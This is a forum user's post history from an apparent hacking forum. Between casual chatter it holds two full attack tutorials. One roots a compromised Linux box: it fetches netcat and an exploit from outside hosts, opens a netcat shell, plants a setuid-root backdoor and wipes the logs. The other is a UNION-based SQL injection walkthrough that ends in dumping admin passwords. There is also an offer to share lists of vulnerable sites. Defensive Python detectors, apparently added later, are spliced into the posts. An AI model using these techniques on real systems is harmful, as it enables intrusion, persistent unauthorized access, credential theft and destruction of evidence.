paxnWo

Active Members
  • Posts: 2743
  • Joined
  • Last visited
  • Days Won: 18

Everything posted by paxnWo

  1. thanks. I'm going to start posting RFI-vulnerable sites. I'll give you the list, you play with them
  2. paxnWo

    Happy Day

    thanks a lot <'>
  3. bah, why the hell are you going so far off topic? damn post hunters
  4. 1. Most complete SQL injection paper: http://pastebin.com/f5e40a4c9
    2. Blind Injections SQL Revised: http://pastebin.com/f67db979
  5. paxnWo

    Happy Day

    happy bday app, tomorrow is my birthday xD
  6. when I get a laptop I'll put gOS on it
  7. you like bt3, but what does it help you with? what do you use it for? I'm a slack user. I have never used a GUI on Linux, only the CLI. And I have never used Linux for multimedia or other junk; in general I've used it for web servers and emulators.
  8. paxnWo

    crlz08

    welcome. use search and help. don't spam and don't go off topic
  9. http://www.softpedia.com/get/Internet/Other-Internet-Related/RST-IP-Locator.shtml
  10. I'm recording video tutorials dedicated to my fans; leave a request here. We exclude: deface.
  11. the exploit is for redhat 6.2 and is executed from the shell. touch exploit.run | most, copy the exploit in and save it. exploit.run
  12. nope . ......
  13. yes, have fun pwning
  14. it's a scanner written in Python. here's how to use it: http://www.rstcenter.com/forum/showthread.php?t=12970&highlight=python
  15. Required for this tutorial:

    Access to a shell - upload by any means a shell onto a box
    mig-log cleaner - http://b14ck1c3.freehostia.com/miglc
    Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip
    Netcat (unix) - http://b14ck1c3.freehostia.com/nc
    Local Root Exploit - http://jshooter.by.ru/xpl/
    half a brain
    willingness to learn

    Now that you have all that in order let's begin. Go to the path of or access your shell by whatever means necessary. Make sure that your shell is in a writable folder just to make things easy for us. In our case today for this tutorial we will be using storm7shell, not exactly my favorite but it will get the job done nonetheless. An example of this location would be something like: http://target/youshell.php

    Now that we are on your shell's page we want to find out what OS this box is running and what version the kernel is. In our case it's Linux 2.6.8. So we will want to find a local root exploit for this kernel version of the Linux OS. What we want to do now that we have our local root exploit for our kernel is spawn a shell so that we can talk to the victim's box and run our commands without interruption. But how are we supposed to do that? This can be done by using a tool called Netcat. So now that we have a copy of Netcat we will go to the shell, find the command execution area of the shell and enter:

        wget http://b14ck1c3.freehostia.com/nc

    What this will do is download the file of Netcat I have pre-compiled and hosted for you onto the victim box to the location of your shell. Once we have the download complete we will want to chmod it so that our user has access to run it, which can be done by entering:

        chmod +x nc

    What this does is grant everyone (user, group and other) execute permission on the file nc, which we had just previously downloaded onto the box with the wget command.

    Now that we have nc installed on both the victim machine and your own it's time to make our connection. How do we make a connection with nc? In the command execution area of your shell enter:

        ./nc -l -p 8080 -e /bin/sh

    (shell can be /bin/sh or cmd.exe for example.) And then on the netcat installed on your pc you will want to enter:

        nc VictimIP Port    (in our case 8080, e.g. nc 123.123.123.123 8080)

    What this will do is cause the netcat on the victim's box to listen on port 8080 and shovel back an interactive shell for you once you make the connection from which you typed nc victimip port.

    Now that we have our interactive shell spawned we can start to prepare the box for rooting. First we will want to get our local root exploit onto the box and get it compiled if it's not already. This can be done by once again using that nifty wget command we learned about in the previous steps:

        wget http://yoursite/xpl

    What we have done is now downloaded your exploit. If your exploit is not already compiled you will need to compile it in order to run it. Compiling your exploit can be done by using gcc, like so:

        gcc xpl.c -o xpl;chmod +x xpl

    This will compile your xpl.c and output it into a file called xpl, which will be the compiled copy of your exploit, and then chmod xpl. Now you are ready to run your exploit and get your root on. The exploits will vary in their usage so make sure you have an understanding of the root exploit you are using. You can run your xpl file by entering:

        ./xpl

    Wait until your exploit is finished running; once it is done enter:

        whoami

    What the whoami command does is tell you who you are. If this tells you root then your xpl has done its job and you now have root privs on the box. Or you can type:

        id

    which will give you something like:

        uid=0(root) gid=0(root) groups=500(apache)

    or something similar. And now you can do your happy dance.

    Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make sure that we can come and go as we please without all the hassle of rooting the box over and over. So we will want to create some kind of backdoor. We can make this happen with a few lines of code:

        #include <stdio.h>
        #include <stdlib.h>
        #include <sys/types.h>
        #include <unistd.h>

        int main( void )
        {
            setuid( 0 );
            system( "/bin/bash" );
            return 0;
        }

    Compile it and change permissions:

        root@foobar /root# gcc -o .bkdr main.c
        root@foobar /root# chown root:root .bkdr
        root@foobar /root# chmod +s .bkdr

    Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferably in the $PATH) and if you execute it as another user:

        raif@foobar /home/raif$ /usr/local/bin/.bkdr
        root@foobar /home/raif# whoami
        root

    Now you have your access back. Alright, we have almost completed our mission: we have successfully rooted our victim's box and created our backdoor; now all we need to do is wipe the tracks that we left in the logs and be on our way. This can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner, which you can get here: http://b14ck1c3.freehostia.com/miglc

    Once again we can use our wget command to upload our log cleaner to the rooted box:

        wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc

    Now just run the log cleaner:

        ./miglc

    The mig-log cleaner has a wide variety of functions which are displayed when you run the log cleaner so you may choose how exactly you want to clean the logs with the commands given to you.

    Credits: w3tw0rk
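    The persistence step in the post above is a root-owned setuid binary with a dot-prefixed name dropped into $PATH. As an added defensive example (not part of the original post or of its credited author's material), here is a Python check that walks the $PATH directories and reports exactly that kind of file; the baseline allowlist of setuid binaries that are normal on most Linux systems is an assumption to adjust per host, and classify() takes plain (path, mode, uid) records so it can be exercised on constructed data.

```python
import os
import stat

# Setuid/setgid binaries that are expected on most Linux systems (assumption: tune to your own baseline).
BASELINE = {"passwd", "su", "sudo", "mount", "umount", "ping", "chsh", "chfn", "newgrp", "gpasswd"}

# One record per file: (path, st_mode, st_uid), the same fields os.lstat() gives us.


def collect_entries(dirs):
    """lstat every regular file directly inside the given directories (typically the $PATH dirs)."""
    entries = []
    for d in dirs:
        try:
            names = os.listdir(d)
        except OSError:          # missing or unreadable directory: skip, don't abort the scan
            continue
        for name in names:
            path = os.path.join(d, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                entries.append((path, st.st_mode, st.st_uid))
    return entries


def classify(entries):
    """Flag setuid/setgid files owned by root that are not in the baseline.
    Dot-prefixed names get an extra reason, since the post hides its binary as '.bkdr'."""
    findings = []
    for path, mode, uid in entries:
        if uid != 0:
            continue             # the setuid bit only hands out root when root owns the file
        reasons = []
        if mode & stat.S_ISUID:
            reasons.append("setuid-root")
        if mode & stat.S_ISGID:
            reasons.append("setgid-root")
        name = os.path.basename(path)
        if not reasons or name in BASELINE:
            continue
        if name.startswith("."):
            reasons.append("hidden-name")
        findings.append((path, reasons))
    return findings


def scan_path():
    """Convenience wrapper: classify every regular file found on the current $PATH."""
    return classify(collect_entries(os.environ.get("PATH", "").split(os.pathsep)))
```

    Run scan_path() periodically (or diff its output against a known-good snapshot) so a new root-owned setuid file on $PATH shows up even when the system logs have been cleaned.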
  16. it depends on the Linux distribution; the same exploit doesn't apply to all of them. exploits: http://www.irongeek.com/i.php?page=videos/metasploit1 http://www.milw0rm.com/platforms/linux see this tutorial: http://www.rstcenter.com/forum/showthread.php?p=81478#post81478
  17. md5 is one-way, you can't decrypt it. you can crack it. also try milw0rm or john the ripper (see this: http://www.osix.net/modules/article/?id=455)
  18. rootshell. meaning you have admin privileges.
  19. always, anytime, anyhow
  20. this thread is totally useless, it won't help you with anything. it doesn't apply only to Romanians, these are generic things. here's a wordlist. it has a few million words; I haven't sorted it, I'm not crazy, that takes 10 days. wordlist.txt - 37.2 Mb
  21. bah, are you crazy? come on the chat http://www.rstcenter.com/chat/ maybe I'll find you one. I found you one. send me an email at paxnwo@yahoo.com and I'll send you the account details.
  22. hex was VIP, I think. anyway, this thread was opened for admins, not for us. I can't give my opinion since I don't know him.
  23. how I remember slightly longer passwords: 112358131m2s3r4g^^^ where 112358131 - Fibonacci numbers; 1m2s3r4g - 1 for the money, 2 for the show, 3 to get ready and 4 to go; ^^^ - 666
  24. I will try to present the method I'm using when doing SQL Injections. This tutorial/guide will be wrapped around PHP + MySQL (MyISAM, default engine as of MySQL 3.23). I assume you have basic PHP and MySQL knowledge.

    How can I find out if a site is vulnerable to SQL injection?

    Let's suppose that you are surfing a site and you notice that the link looks like this:

        http://site.com/view.php?id=1234

    You try to see if it is vulnerable by adding a character such as ' or " and the URL will look similar to:

        http://site.com/view.php?id=1234'
        or
        http://site.com/view.php?id=1234"

    If it gives an error such as:

        1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1234''' at line 1

    Very nice. We have some vulnerable code to play with. Let's try to visualize how the programmer wrote the vulnerable PHP code.

        $query = "SELECT * FROM products WHERE id='". $_GET['id'] ."'";
        mysql_query($query);
        echo mysql_error();

    We can clearly see that he did not try to sanitize any of the variables. To further test if you can create a valid MySQL query you could try to insert ' or 1='1, thus creating the link:

        http://site.com/view.php?id=' or 1='1

    If it does not give you an error it means that you can probably insert whatever your heart desires. Let's make a small analysis of the SQL queries just created. If you insert 1234' the query looks like this:

        SELECT * FROM products WHERE id='1234''

    It is obviously wrong. If you insert ' or 1='1 you get:

        SELECT * FROM products WHERE id='' or 1='1'

    This is a valid SQL statement that will retrieve the first item in the table. Ok, at this point we know we can SQL inject the victim. What's next?

    Preparing for the attack

    We need to find how many columns the table products has. This is pretty easy. I strongly recommend using HackBar at least from now on. This is done by adding ' ORDER BY [number]. You start from 1 and end when you get a MySQL error. Then you will know that the previous number was the limit of the columns that are retrieved in the query. It goes like this:

        http://site.com/view.php?id=1234' ORDER BY 1 /*
        http://site.com/view.php?id=1234' ORDER BY 2 /*
        ...
        http://site.com/view.php?id=1234' ORDER BY 7 /*
        http://site.com/view.php?id=1234' ORDER BY 8 /*   <- here we get the MySQL error we were searching for.

    This means that the select retrieves 7 columns. What next?

    Doing a basic attack

    First we need to create the basic string that will help us get the information we want from the database.

        http://site.com/view.php?id=12349999' UNION ALL SELECT 1,2,3,4,5,6,7 FROM [tablename] /*

    This is it. Why did I insert 12349999? Because we don't want anything else to be selected from the table, we only want the information that helps us. So I inserted an id that I am sure does not exist. And we start searching for table names until we don't get a MySQL error. You could try table names like: user, users, members, admin, member, ... But what can I do if I cannot guess a valid table name? This brings us to the next step.

    When you execute this query you need to find some of the numbers in the page. For example if you see the numbers 2 and 4 in the page you know that the second and the fourth columns are echoed. We will use these columns to retrieve the data we want in the next steps.

    Extracting the database structure through SQL Injection

    MySQL has a database named information_schema. This database has all the information we want. For example it has a table named TABLES. If you install the MySQL engine and you look at this table you can clearly see what it has stored. You can fetch the table names from there. Let's see how such a query looks:

        http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables/*

    The problem here is that we do not retrieve exactly the data we want. We need to change some things. We need the database name that we want to attack. This can be retrieved with:

        http://site.com/view.php?id=12349999' union all select 1,2,3,4,5,6,7 from TableThatDoesNotExist/*

    It will output an error that discloses the database name:

        1146: Table 'DataBaseName.TableThatDoesNotExist' doesn't exist

    Using this information we can create this query:

        http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' /*

    Here we have another problem: we can see only 1 table name and its number of inserted rows. We need to surf through all the tables of this database.

        http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 1,1/*
        (this gives us the first table name)
        http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 2,1/*
        (the second table name)
        http://site.com/view.php?id=12349999' union all select 1,TABLE_NAME,3,TABLE_ROWS,5,6,7 from information_schema.tables where TABLE_SCHEMA='DataBaseName' LIMIT 3,1/*
        (the third, and so on, until we get all the table names)

    I suggest you note the information retrieved because you will need it for further digging. Ok, so we have all the table names now. What do we need to do next? The column names. This is very similar, because this information is also stored in the information_schema database.

        http://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 1,1/*
        (the first column name of table members)
        http://site.com/view.php?id=12349999' union all select 1,COLUMN_NAME,3,PRIVILEGES,5,6,7 from information_schema.columns where TABLE_SCHEMA='DataBaseName' and TABLE_NAME='members' limit 2,1/*
        (the second one, and so on...)

    At this point we have the table names with their column names also. I think we have all we need now.

    Chanting the magic words

    As I said we have the table names and the column names. Let's create the query that will read a username and password from table members:

        http://site.com/view.php?id=12349999' union all select 1,user,3,password,5,6,7 from members where LIMIT 1,1/*

    That was it folks. Log in with the admin password, or create a script that will extract any data you want from their database. Your choice.

    by zbeng
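    Every step of the guide above leaves a recognisable trace in the web server's access log: the appended quote, the ORDER BY enumeration, the UNION SELECT against information_schema. As an added example from the defender's side (not part of the original post or of zbeng's tutorial), a small Python scanner that parses Apache-style log lines, decodes each query-string value and scores it against one rule per step, then totals the score per client IP so the probe-enumerate-dump sequence stands out. The log lines, client IPs and rule weights are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access-log lines: 10.0.0.9 walks the tutorial's chain step by step.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2008:13:55:36 +0000] "GET /view.php?id=1234 HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2008:13:55:40 +0000] "GET /view.php?id=1234' HTTP/1.1" 200 310
10.0.0.9 - - [10/Oct/2008:13:55:52 +0000] "GET /view.php?id=1234'%20ORDER%20BY%208%20/* HTTP/1.1" 200 310
10.0.0.9 - - [10/Oct/2008:13:56:10 +0000] "GET /view.php?id=12349999'%20union%20all%20select%201,TABLE_NAME,3,TABLE_ROWS,5,6,7%20from%20information_schema.tables/* HTTP/1.1" 200 4870
10.0.0.7 - - [10/Oct/2008:13:57:01 +0000] "GET /search.php?q=o'neil HTTP/1.1" 200 2200
"""

# client, two "-" fields, [timestamp], "METHOD path protocol", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" \d{3} \d+')

# One rule per step of the guide; the weights are a constructed heuristic, tune them to your traffic.
RULES = [
    ("quote-probe", re.compile(r'^\d+[\'"]\s*$'), 1),                        # id=1234'
    ("tautology", re.compile(r'[\'"]\s*or\s+\S+\s*=\s*[\'"]?\S', re.I), 3),  # ' or 1='1
    ("order-by-enum", re.compile(r'[\'"]\s*order\s+by\s+\d+', re.I), 3),    # ' ORDER BY 8 /*
    ("union-select", re.compile(r'\bunion\s+(all\s+)?select\b', re.I), 4),
    ("schema-dump", re.compile(r'information_schema\.(tables|columns)', re.I), 5),
]


def analyze_query(raw_query):
    """Score the percent-decoded parameter values of one request; returns (score, [rule names])."""
    score, hits = 0, []
    for _name, value in parse_qsl(raw_query, keep_blank_values=True):
        for rule_name, pattern, weight in RULES:
            if pattern.search(value):
                hits.append(rule_name)
                score += weight
    return score, hits


def scan_log(text):
    """Return (ip, path, score, hits) for every request whose query string trips a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        score, hits = analyze_query(urlsplit(m.group("path")).query)
        if score:
            findings.append((m.group("ip"), m.group("path"), score, hits))
    return findings


def score_by_ip(text):
    """Aggregate per client so one host's probe, enumerate, dump sequence adds up."""
    totals = {}
    for ip, _path, score, _hits in scan_log(text):
        totals[ip] = totals.get(ip, 0) + score
    return totals
```

    The quote-only probe scores low on its own because legitimate input such as o'neil contains apostrophes too; it is the accumulation per IP, not any single hit, that is worth an alert.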
  25. Has anyone done the MCSA courses?